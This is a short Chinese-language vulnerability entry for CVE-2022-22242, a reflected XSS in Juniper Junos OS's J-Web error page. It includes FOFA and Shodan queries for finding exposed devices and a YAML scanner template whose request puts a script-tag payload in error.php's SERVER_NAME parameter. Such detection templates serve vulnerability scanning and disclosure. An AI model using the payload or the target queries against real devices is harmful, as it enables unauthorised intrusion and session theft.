漏洞描述
CVE-2022-22242它是位于出错页面 (“error.php”) 上的预认证反射型XSS漏洞,可导致远程攻击者嗅探 Junos OS 管理员会话并与其它要求认证的缺陷组合利用。
FOFA: icon_hash="1167011145"
SHODAN: title:"Juniper Web Device Manager"
CVE-2022-22242: Juniper Networks Junos OS 错误页面反射 XSS 漏洞
PoC代码[已公开]
id: CVE-2022-22242
info:
name: Juniper Networks Junos OS 错误页面反射 XSS 漏洞
author: daffainfo,EvergreenCartoons
severity: medium
verified: true
description: |
CVE-2022-22242它是位于出错页面 (“error.php”) 上的预认证反射型XSS漏洞,可导致远程攻击者嗅探 Junos OS 管理员会话并与其它要求认证的缺陷组合利用。
FOFA: icon_hash="1167011145"
SHODAN: title:"Juniper Web Device Manager"
reference:
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
- https://kb.juniper.net/JSA69899
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
tags: cve,cve2022,xss,juniper,junos
created: 2023/06/22
rules:
r0:
request:
method: GET
path: /error.php?SERVER_NAME=<script>alert(document.domain)</script>
expression: |
response.status == 200 &&
response.body.bcontains(b"<script>alert(document.domain)</script>") &&
response.body.bcontains(b"The requested resource is not authorized to view") &&
response.raw_header.bcontains(b"text/html")
expression: r0()